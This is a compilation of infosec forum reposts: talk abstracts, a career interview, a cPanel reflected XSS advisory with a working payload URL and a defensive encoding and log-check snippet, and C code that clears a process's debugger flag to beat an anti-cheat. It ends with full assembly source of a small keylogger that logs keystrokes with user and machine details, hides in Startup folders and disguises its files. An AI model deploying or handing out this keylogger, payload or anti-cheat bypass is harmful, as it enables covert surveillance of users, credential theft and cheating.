The Browser Exploit Framework (BeEF) Project is extremely popular with application pentesters as it is a powerful tool for demonstrating the impacts of leveraging XSS vulnerabilities to achieve wider compromise into an organization. What if, however, we flipped the BeEF use-case around and instead put it in the hands of web application defenders? By using the open source ModSecurity WAF, we can dynamically hook web attackers with BeEF and monitor their activities and initiate various counter-measures.

*****

Speaker: Ryan Barnett, Lead Security Researcher, Trustwave SpiderLabs, Metro DC

Ryan C. Barnett is renowned in the web application security industry for his unique expertise. After a decade of experience defending government and commercial websites, Ryan joined Trustwave SpiderLabs Research Team. He specializes in application defense research and leads the open source ModSecurity web application firewall project. In addition to his commercial work at Trustwave, Ryan is also an active contributor to many community-based security projects. He serves as the Open Web Application Security Project (OWASP) ModSecurity Core Rule Set project leader and contributor on the OWASP Top Ten and AppSensor projects. He is a Web Application Security Consortium Board Member and leads the Web Hacking Incident Database and the Distributed Web Honeypot projects. At the SANS Institute, he is a certified instructor and contributor on the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors projects. Ryan is regularly consulted by news outlets who are seeking his insights and analysis on emerging web application attacks, trends and defensive techniques. Ryan is a frequent speaker and trainer at key industry events including Blackhat, SANS AppSec Summit and OWASP AppSecUSA. Ryan has authored two web security books with titles such as: "Preventing Web Attacks with Apache" from Pearson Publishing and the forthcoming "Web Application Defender's Cookbook: Battling Hackers and Protecting Users" from Wiley Brothers Publishing.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Building a Web Attacker Dashboard with ModSecurity and BeEF - Ryan Barnett on Vimeo

Source: Building A Web Attacker Dashboard With Modsecurity And Beef
-
Top Ten Web Defenses

Description: Abstract

We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications. The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed.

*****

Speaker: Jim Manico, VP Security Architecture, WhiteHat Security

Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur…

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Top Ten Web Defenses - Jim Manico on Vimeo

Source: Top Ten Web Defenses
-
C-Panel Cross Site Scripting

C-Panel suffers from a reflective cross site scripting vulnerability in manage.html.

CPanel Non Persistent XSS

Details
=============
Product: Cpanel
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: http://www.cpanel.net
Advisory-Status: NotPublished

Credits
=============
Discovered by: Rafay Baloch of RafayHackingArticles(RHA)

Affected Products:
=============
Cpanel's Latest Version

Description
=============
"Simploo website management."

More Details
=============
I have discovered a non persistent Cross site scripting (XSS) inside Cpanel; the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user.

Proof of Concept
=============
Log into your CPanel account and navigate to the following link:
https://localhost/frontend/x3/mail/manage.html?account=
Now insert your xss payload inside the account parameter.

Exploit
=============
https://localhost/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E

Solution
=============
Edit the source code to ensure that input is properly sanitised.

Timeline
================

Use of terms
================

--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com

Sursa: C-Panel Cross Site Scripting ? Packet Storm
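The advisory's fix is output encoding for the reflected `account` value. The following added example (not cPanel's code and not from the advisory) renders the parameter the vulnerable way and the attribute-encoded way, shows that the advisory's own payload only breaks out of the attribute in the first case, and flags the same payload in constructed access-log lines. The input template, log format and function names are assumptions for illustration.

```python
"""Added example: attribute encoding for a reflected parameter, plus a
log check for the advisory payload. Not cPanel code; assumed template."""
import html
import re
from urllib.parse import urlsplit, unquote

# The exploit URL exactly as given in the advisory.
ADVISORY_URL = ("https://localhost/frontend/x3/mail/manage.html?account="
                "%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E")


def account_from_url(url: str) -> str:
    """Extract and percent-decode the account parameter (first '=' only,
    so '=' inside the payload stays part of the value)."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "account":
            return unquote(value)
    return ""


def render_vulnerable(account: str) -> str:
    """Reflects the value verbatim into an attribute: the flaw reported."""
    return f'<input type="text" name="account" value="{account}">'


def render_fixed(account: str) -> str:
    """Encodes for the HTML attribute context, so a leading quote cannot
    close the attribute and '<' cannot start a new element."""
    return (f'<input type="text" name="account" '
            f'value="{html.escape(account, quote=True)}">')


TAG_START = re.compile(r"<[a-zA-Z]")


def breaks_out(rendered: str) -> bool:
    """The template contributes exactly one element start; any second one
    came from the reflected value."""
    return len(TAG_START.findall(rendered)) > 1


# Constructed sample log lines (not real cPanel logs), second one carries the payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Dec/2012:10:00:01] "GET /frontend/x3/mail/manage.html?account=bob HTTP/1.1" 200',
    '10.0.0.9 - - [26/Dec/2012:10:00:07] "GET /frontend/x3/mail/manage.html?account='
    '%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E HTTP/1.1" 200',
]

# An element start followed by an on* event-handler attribute.
MARKUP_WITH_HANDLER = re.compile(r"<\s*[a-z]+[^>]*\bon[a-z]+\s*=", re.I)


def flag_xss_attempts(lines):
    """Return (client, decoded account value) for requests whose account
    parameter decodes to markup with an event handler."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        value = account_from_url(m.group(1))
        if MARKUP_WITH_HANDLER.search(value):
            hits.append((line.split()[0], value))
    return hits
```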
-
Hook Analyser Malware Tool 2.2 Authored by Beenu Arora | Site hookanalyser.blogspot.com Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. Changes: The UI and modules of the project have been re-written. The interactive mode is now more verbose. The (static) malware analysis module has been enhanced. Bug fixes and other improvements. Download: http://packetstormsecurity.org/files/download/119087/HookAnalyser2.2.zip Sursa: Hook Analyser Malware Tool 2.2 ? Packet Storm
-
[h=1]Q&A: Interview with an IT Security Analyst[/h]Tim Heard December 24, 2012 (Rebecca Turner is an IT security analyst, employed by a leading global services provider. Rebecca began her career in IT as a helpdesk technician and has advanced through a number of roles. She has considerable experience as a field engineer, and also as a systems administrator.) Q: I see from your background that you began your IT career working as a helpdesk technician. How did you get interested in IT security, and what led to you being in your current role? A. I was an office manager for several years, and helped bring a small office into the computer age, just by reading and a few community college classes. I found that I really, really enjoyed PCs and figuring out how to set them up. I realized that I didn’t want to be a secretary the rest of my life, so I kept going in college and eventually landed a junior helpdesk role 13 years ago. Q. What are the main duties of your current position? A. I now work in IT Security. I scan PCs when they are infected, perform network and local vulnerability assessments, and handle patching and reporting. Q. How well do you feel your training and education have prepared you for this position? A. I think my early training (A+, Net+ and college) was very valuable in my technical role. It gave me a solid foundation to continue on with. Q. What specific certifications have you earned? A. A+, Net+, Novell CNE 6, Security+, CISSP. Q. Looking back at your career, which of them have been the most helpful? A. A+ and Net+ for the early years, Security+ and CISSP for my current position. Q. Which of them, if any, have best prepared you for your current role, and why? A. CISSP, as the study gave me great overview of the security world Q. Are there certain certification programs which you feel, in retrospect, weren’t all that helpful in terms of preparing you for your career? A. My Novell CNE. I only got it to get a new job. 
I really never used the information. Q. If you could take additional coursework right now, or earn an additional certification, what would it be, and why? A. CEH, SANS 504. I want to learn more about pen testing and ethical hacking. Q. What are the main challenges someone faces as an IT security analyst that someone who is thinking of entering the field might not think about? A. It’s very important to have a technical background when going into the security field. At least five years would be my recommendation. Q. What advice would you give an IT generalist who is thinking of pursuing a career in IT Security? A. Get your technical certs, like A+ and Net+. Make sure you have at least five years of good hands-on technical troubleshooting. Q. What do you think are the prospects for this field in terms of job growth? A. I think the prospects are great. I think the job growth is only going to go up Q. What changes do you expect to see in the coming years? A. I HOPE that hiring managers learn the differences in the various certs and what they are used for. Why ask for a CISSP when you really need someone who just has a Security+? I expect to see more security generalist jobs, as companies try to cut costs. The more technical you are, the better path I think you’ll have since you’ll have the experience necessary to be that generalist. I also think we’re going to see many more compliance scanning jobs (PCI, HIPAA, SOX, etc), as more companies get into that kind of business. Sursa: InfoSec Institute Resources – Q&A: Interview with an IT Security Analyst
-
Four Axes Of Evil Description: Abstract This presentation focuses on large-scale internet vulnerability research from four unique perspectives, identifying patterns and exposing security issues that are difficult to identify using traditional approaches. ***** Speaker HD Moore, CSO, Rapid7 HD is Chief Security Officer at Rapid7 and Chief Architect of Metasploit, the leading open-source penetration testing platform. HD founded the Metasploit Project in the summer of 2003 with the goal of becoming a public resource for exploit code research and development. ***** Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Four Axes of Evil - HD Moore on Vimeo Sursa: Four Axes Of Evil
-
Bug Bounty Programs Description: Speakers
Michael Coates, Director of Security Assurance, Mozilla. Michael Coates is the Director of Security Assurance at Mozilla. He is responsible for Mozilla’s software and infrastructure security which includes Firefox, web applications, and critical infrastructure. In this role he sets the security assurance strategy to integrate security into the development lifecycle of all applications and ensures that the organization's infrastructure is designed to minimize risk and protect critical data. Michael is also the Chairman of the OWASP board, …
Chris Evans, Troublemaker, Google. Chris Evans is the author of vsftpd, a vulnerability researcher and for a paycheck, he built and now looks after the Google Chrome Security Team. Unruly bunch. Details of vsftpd are at security.appspot.com/vsftpd.html. His research includes vulnerabilities in all the major browsers (Firefox, Safari, Internet Explorer, Opera, Chrome); the Linux and OpenBSD kernels; Sun's JDK; and lots of open source packages. He blogs about some of his work at scarybeastsecurity.blogspot.c…
Jeremiah Grossman, CTO, WhiteHat Security. Jeremiah Grossman is the Founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web security R&D and industry outreach. Over the last decade, Mr. Grossman has written dozens of articles, white papers, and is a published author. His work has been featured in the Wall Street Journal, Forbes, NY Times and hundreds of other media outlets around the world. As a well-known security expert and industry veteran, Mr. Grossman has been a guest speaker on six con…
Adam Mein, Security Program Manager, Google. Some people like to find bugs; Adam likes to make sure they get fixed. He gets lots of opportunities to fulfill this (admittedly, sad) ambition as Manager of Google's Vulnerability Management team and Web Reward Program. Outside of work, Adam spends most of his time chasing around his 10 month old son and supporting his beloved Canberra Raiders rugby league team.
Alex Rice, Product Security, Facebook.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Bug Bounty Programs - Michael Coates, Chris Evans, Jeremiah Grossman, Adam Mein, Alex Rice on Vimeo Sursa: Bug Bounty Programs
-
[h=1]Hook (bypass) kernel32.dll IsDebuggerPresent[/h]By: [h=3]try catch[/h]I've found some code that bypasses IsDebuggerPresent in an anti-cheat, but I don't know how to use it. Follow the code:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* pi describes a child process; the function clears the BeingDebugged byte
   in that process's PEB so IsDebuggerPresent() there reports FALSE. */
char KillIsDebuggerPresent(PROCESS_INFORMATION pi)
{
    DWORD tib, pib;
    LDT_ENTRY segselector;
    CONTEXT TempContext;

    TempContext.ContextFlags = CONTEXT_SEGMENTS;
    GetThreadContext(pi.hThread, &TempContext);
    /* base of the FS segment is the thread's TIB (32-bit process) */
    GetThreadSelectorEntry(pi.hThread, TempContext.SegFs, &segselector);
    tib = ((segselector.HighWord.Bytes.BaseHi) << 24) +
          ((segselector.HighWord.Bytes.BaseMid) << 16) +
          (segselector.BaseLow);
    //printf("TIB @ %X\n", tib);

    /* TIB+0x30 holds the pointer to the PEB */
    if (ReadProcessMemory(pi.hProcess, (void *)(tib + 0x30), &pib, sizeof(pib), NULL) == 0) {
        printf("Could not get PIB from TIB !\n");
        return 0;
    } else {
        char debug_info = 0xFF;
        // printf("PIB @ %X\n", pib);
        pib += 2;   /* PEB+2 is the BeingDebugged byte */
        if (ReadProcessMemory(pi.hProcess, (void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) {
            printf("Unable to read from PIB !\n");
            return 0;
        } else {
            // printf("Old debug value in PIB: %X\n", debug_info);
            if (debug_info != 0x01) {
                printf("PB value unexpected. Aborting!");
                return 0;
            } else {
                debug_info = 0;
                if (WriteProcessMemory(pi.hProcess, (void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) {
                    printf("Could not write new value into PIB !\n");
                    return 0;
                } else {
                    //printf("PIB debug value override ok!\n");
                    return 1;
                }
            } // debug info
        } // read pib
    } // read tib
}

int main()
{
    KillIsDebuggerPresent(...);
    return 0;
}

Sursa: Hook (bypass) kernel32.dll IsDebuggerPresent - rohitab.com - Forums
-
[h=1]Basic key logger but very small[/h]By: [h=3]drew77[/h] This isn't fancy like some I have seen here, but it is less than 5000 bytes. I am interested in a keylogger that would save screenshots at adjustable intervals as well as typed input. ;******************************************************************************************* ; (BEST Viewed with NOTEPAD) ; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved ; ; "We Don't NEED no STINKIN DLL!"......ENJOY! vist http://testing.OnlyTheRightAnswers.com ; ; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook ; This Program is for Educational Proof Of Concept Use ONLY! ; ; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks ; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration ; this proof of concept was created. Log Items include: ; ; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name ; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL ; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in ; the startup folder of any user, or for all users. ; ; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this ; can be done automatically by simply placing the program in the: ; ; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder ; ; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt ; ("You can change the File to Hidden if needed") ; ; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off ; ; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level. 
; ; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt ; ;******************************************************************************************* .386 .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\advapi32.inc include \masm32\include\msvcrt.inc include \masm32\macros\macros.asm includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\msvcrt.lib ;== Prototypes ================================================================= KeyBoardProc proto :DWORD, :WPARAM, :LPARAM ;== Prototypes ================================================================= pushz macro szText:VARARG local nexti call nexti db szText,00h nexti: endm .data CopyRight db "CopyRight 2005, ZOverLords@Yahoo.com" Vist db "http://testing.OnlyTheRightAnswers.com " hBuffer dd ? hComputerName db 32 dup(0) hCurrentThreadPiD dd 0 hCurrentWindow dd 0 hDateFormat db "dd MMM yyyy", 0 hDomaineName db 128 dup(0) hFile dd 0 hHook dd 0 hmodul MODULEENTRY32 <> hSnapShot dd 0 hTimeFormat db "hh:mm:ss tt", 0 hUserName db 32 dup(0) msg MSG <> onlyOneCopy db "Global\zkl",0 .code main: invoke CreateMutexA,0,0,ADDR onlyOneCopy invoke GetLastError ; check to make sure we are the only copy running call GetLastError ; for fast user switching we still support one cmp eax,ERROR_ALREADY_EXISTS ; copy per user, but if we are the second copy je more_than_one_copy ; trying to start, we exit xor ebx, ebx invoke RegisterHotKey, NULL, 0badfaceh, MOD_CONTROL or MOD_ALT, VK_F11 pushz "ab" ; append in binary mode pushz "ZKeyLog.txt" ; name of log file call fopen add esp, 2*4 ; all c lib functions need fixup.. 
;mov [hFile], eax ; save our file number mov hFile,eax invoke GetModuleHandleA, NULL invoke SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx mov [hHook], eax ; ok here is our hook handle for later invoke GetMessageA, ADDR msg, NULL, NULL, NULL invoke UnhookWindowsHookEx, hHook invoke fclose, hFile more_than_one_copy: invoke ExitProcess, 0h ;############################################################## KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD LOCAL lpKeyState[256] :BYTE LOCAL lpClassName[64] :BYTE LOCAL lpCharBuf[32] :BYTE LOCAL lpDateBuf[12] :BYTE LOCAL lpTimeBuf[12] :BYTE LOCAL lpLocalTime :SYSTEMTIME ;---------------------------- lea edi, [lpKeyState] ; lets zero out our buffers push 256/4 pop ecx xor eax, eax rep stosd ; sets us up for doubleword from EAX mov eax, wParam cmp eax, WM_KEYUP ; only need WM_KEYDOWN je next_hook ; bypass double logging cmp eax, WM_SYSKEYUP ; only Need WM_SYSKEYDOWN je next_hook ; bypass double logging invoke GetForegroundWindow ; get handle for currently used window ( specific to NT ) cmp [hCurrentWindow], eax ; if its different to last one saved.. 
je no_window_change ; bypass all the headings mov [hCurrentWindow], eax ; save it for use now and compare later invoke GetClassName, hCurrentWindow, ADDR lpClassName, 64 invoke GetLocalTime, ADDR lpLocalTime invoke GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12 invoke GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12 invoke GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD mov hSnapShot,eax mov hmodul.dwSize, sizeof MODULEENTRY32 invoke Module32First,hSnapShot,addr hmodul invoke CloseHandle,hSnapShot invoke GetWindowText, hCurrentWindow, ADDR lpKeyState, 256 lea esi, [hmodul.szExePath] ; print the current program exe name push esi lea esi, [lpTimeBuf] ; print the formatted time push esi lea esi, [lpDateBuf] ; print the formatted date push esi pushz 13,10,"[%s, %s - Program:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 lea esi, [lpClassName] ; print the current window class name push esi lea esi, [lpKeyState] ; print the current window title push esi pushz 13,10,"[ Window Title:%s - Window Class:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 mov hBuffer, 128 ; get the current domain name invoke GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer mov hBuffer, 32 ; get the current computer name invoke GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer mov hBuffer, 32 ; get the current user name invoke GetUserName, ADDR hUserName, ADDR hBuffer lea esi, [hUserName] ; print the current user name push esi lea esi, [hComputerName] ; print the current computer name push esi lea esi, [hDomaineName] ; print the current domain name push esi pushz "[ Domain:%s - Computer:%s - User:%s]",13,10 push [hFile] call fprintf add esp, 3*4 invoke fflush, hFile no_window_change: mov esi, [lParam] ; we don't want to print shift or capslock names. 
lodsd ; it just makes the logs easier to read without them. cmp al, VK_LSHIFT ; they are tested later when distinguishing between je next_hook ; bypass left shift Key for upper/lowercase characters cmp al, VK_RSHIFT je next_hook ; bypass right shift Key cmp al, VK_CAPITAL je next_hook ; bypass caps lock Key cmp al, VK_ESCAPE je get_name_of_key ; we Want escape characters cmp al, VK_BACK je get_name_of_key ; we want backspace key cmp al, VK_TAB je get_name_of_key ; we want tab key ;------------------ lea edi, [lpCharBuf] ; zero initialise buffer for key text push 32/4 pop ecx xor eax, eax rep stosd ;---------- lea ebx, [lpKeyState] push ebx call GetKeyboardState ; get current keyboard state invoke GetKeyState, VK_LSHIFT xchg esi, eax ; save result in esi invoke GetKeyState, VK_RSHIFT or eax, esi ; al == 1 if either key is DOWN mov byte ptr [ebx + 16], al ; toggle a shift key to on/off invoke GetKeyState, VK_CAPITAL mov byte ptr [ebx + 20], al ; toggle caps lock to on/off mov esi, [lParam] lea edi, [lpCharBuf] push 00h push edi ; buffer for ascii characters push ebx ; keyboard state lodsd xchg eax, edx lodsd push eax ; hardware scan code push edx ; virutal key code call ToAscii ; convert to human readable characters test eax, eax ; if return zero, continue jnz test_carriage_return ; else, write to file. get_name_of_key: ; no need for large table of pointers to get asciiz mov esi, [lParam] lodsd ; skip virtual key code lodsd ; eax = scancode shl eax, 16 xchg eax, ecx lodsd ; extended key info shl eax, 24 or ecx, eax push 32 lea edi, [lpCharBuf] push edi push ecx call GetKeyNameTextA ; get the key text push edi pushz "[%s]" jmp write_to_file test_carriage_return: push edi pushz "%s" cmp byte ptr [edi], 0dh ; carriage return? jne write_to_file mov byte ptr [edi + 1], 0ah ; add linefeed, so logs are easier to read. 
write_to_file: invoke fprintf, hFile next_hook: invoke CallNextHookEx, hHook, nCode, wParam, lParam ret KeyBoardProc ENDP end main hFile dd 0 invoke fclose, hFile C:\masm32\SOURCE\Log.asm(110) : error A2148: invalid symbol type in expression : fclose Sursa: Basic key logger but very small - rohitab.com - Forums